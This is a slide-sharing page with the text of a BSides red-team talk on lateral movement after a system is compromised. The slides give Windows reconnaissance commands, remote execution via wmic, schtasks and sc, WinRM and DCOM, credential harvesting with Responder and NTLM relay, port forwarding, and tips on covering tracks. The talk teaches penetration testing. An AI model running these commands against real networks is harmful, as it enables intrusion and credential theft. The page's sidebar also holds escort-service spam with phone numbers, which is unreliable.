Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 

Recently uploaded (20)

Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 

Bsides final

  • 1. BSIDES FIRST TIME PRESENTERS Movement After Initial Compromise MATT BATTEN (@SleepZ3R0) COLLYN HARTLEY (@HA12TL3Y)
  • 2. Matt Batten (SleepZ3R0) ▶ Twitter: @SleepZ3R0 ▶ https://github.com/SleepZ3R0 ▶ Where I work: ▶ Husband / Red Teamer / Penetration Tester / Developer / Marine Corps Veteran / Cat Dad
  • 3. Collyn Hartley (HA12TL3Y) ▶ Twitter: @HA12TL3Y ▶ Military Red Teamer ▶ Brother / Red Teamer / Penetration Tester / Active Duty Military / Dog Dad
  • 4. What will be covered ▶ Initial Recon once on a compromised system ▶ Lateral movement ▶ How to do port forwarding in more than one way with real examples ▶ How to utilize tradecraft to not get caught while moving ▶ What tools are being used today
  • 5. Setting the Stage ▶ You have already compromised a system utilizing your preferred method
  • 6. First things first… Once on a compromised system here are some questions to ask yourself. ▶ Who am I on this network? ▶ Where am I in this network? ▶ Can I move to another system with my current permissions? ▶ Can I get system on my current compromised system?
  • 7. Understand your surroundings Part 1 ▶ net user ▶ net user /domain ▶ net group “Domain Admins” /domain ▶ net group /domain ▶ net use ▶ net start ▶ net localgroup /domain ▶ netstat -ano ▶ netsh firewall show state ▶ netsh firewall show config
  • 8. Understand your surroundings Part 2 ▶ ipconfig /all ▶ route print ▶ tasklist /SVC ▶ arp –a ▶ driverquery ▶ hostname ▶ wmic qfe ▶ set ▶ systeminfo | findstr /B /C:”OS Name” /C:”OS Version” ▶ schtasks /query /fo LIST /v ▶ whoami ▶ whoami /all ▶ echo %logonserver% ▶ echo %username%
  • 9. Net user Net user /domain net user net user /domain net group “domain admins” /domain net group /domain
  • 10. Net startnet start net localgroup /domain
  • 12. netsh firewall show config route print
  • 14. Arp -a Set arp -a set schtasks /query /fo list /v
  • 16.
  • 17. ▶ Powerup has a built in module for DLL hijacking that can be used to accomplish priv esc on target. DLL Hijacking
  • 18. Remote Code Execution #1 ▶ WMIC Shell wmic /node:<target> process call create “C:windowstempmatt.exe”
  • 19.
  • 20.
  • 21. Remote Code Execution #2 ▶ SCHTASKS Shell schtasks /create /tn <matt.exe> /tr c:windowstempmatt.exe /sc once /st 00:00 /s <target> /RU system Shell schtasks /run /tn <matt> /s <target> Then delete the tasks after it executes Schell schtasks /F /delete /tn <matt> /s <target>
  • 22.
  • 23. Remote Code Execution #3 ▶ SERVICE (SC) Shell sc <target> create <matt> binpath=“c:windowstemp<matt.exe>” Shell sc <target> start <matt> Make sure to delete the service after it runs Shell sc <target> delete <matt>
  • 24.
  • 26. WinRM ▶ On port 5985 and 5986 (5986 is for encrypted) ▶ If 5985 is open then you can enumerate using WinRm ▶ Have to have local admin permissions to run: Invoke-Command -ComputerName TARGET -ScriptBlock {commands} Windows Server 2008 and newer there is Windows Remote Shell(WRS) winrs -r:http://WIN-2NE38K15TGH/wsman “cmd”
  • 28.
  • 29. DCOM ▶ Matt Nelson documented this method of using DCOM over RPC to instantiate a "MMC20.Application" COM object and then calling the ExecuteShellCommand method. ▶ Result: ▶ Immediate command execution under the administrative account used. ▶ Implementation Details: ▶ Connecting to remote procedure call portmapper interface (RpcSs service in svchost.exe directly listening on TCP port 135) then to an RPC server on an ephemeral port (such as 49154 or 49159 etc.).
  • 31. Responder LLMNR and NBT-NS Spoofing Attack is an easy way, even today, to harvest credentials and laterally move based off of normal network traffic.
  • 32.
  • 34. Multi-Relay ▶ A powerful pentest utility included in Responder's tools folder giving you the ability to perform targeted NTLMv1 and NTLMv2 relay on a selected target. ▶ Currently MultiRelay relays HTTP, WebDav, Proxy, and SMB authentications to an SMB server. ▶ This tool can be customized to accept a range of users to relay to a target. The concept behind this is to only target domain Administrators, local Administrators, or privileged accounts.
  • 35.
  • 36. PORT FORWARDING ▶ SSH port forwarding ssh -L 8080:internalTarget:80 user@compromisedMachine ▶ Metasploit port forwarding portfwd add –l 3389 –p 3389 –r 172.16.194.191 ▶ Plink port forwarding plink.exe {host-B} -P 22 -C -L 127.0.0.1:444:{host-C}:3389 -l username -pw password ▶ Proxychains port forwarding: SOCKS with CobaltStrike
  • 40. Port Forwarding through Meterpreter
  • 42.
  • 43.
  • 44. References ▶ http://www.itprotoday.com/management-mobility/psexec ▶ http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html ▶ https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning ▶ https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python ▶ https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ ▶ https://github.com/gentilkiwi/mimikatz ▶ https://specterops.io/ ▶ https://github.com/rsmudge ▶ https://www.reddit.com/r/AskNetsec/comments/87cfh0/responderpy_mitigation/ (n00py) ▶ https://github.com/BloodHoundAD/BloodHound/ ▶ https://blog.rapid7.com/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit/ ▶ https://www.cybereason.com/blog/dcom-lateral-movement-techniques ▶ https://blog.varonis.com/dcom-distributed-component-object-model
  • 45. People who have influenced us and this talk (even if they don’t know it!) @harmj0y @malwareunicorn @_wald0 @ReL1K @CptJesus @mstair @MadHatt3r @MalwareJake @shortxstack @enigma0x3 @r3dQu1nn @danielhbohannon @merrillmatt011 @georgiaweidman @PyroTek3 @mubix @byt3bl33d3r @H011YxW00D @armitagehacker @Lee_Holmes @gentilkiwi @SpectorOps
  • 46. If you enjoyed this talk and would like to know more ▶ Check out the references on slide earlier. ▶ Slides will be published publicly ▶ Because we do not know where we are posting the slides yet if you follow on Twitter we will let you know shortly ▶ If you have any questions or just interested in talking feel free to message either of us on Twitter, and we will respond in a timely manner. ▶ @SleepZ3R0 ▶ https://github.com/SleepZ3R0 ▶ @HA12TL3Y Questions?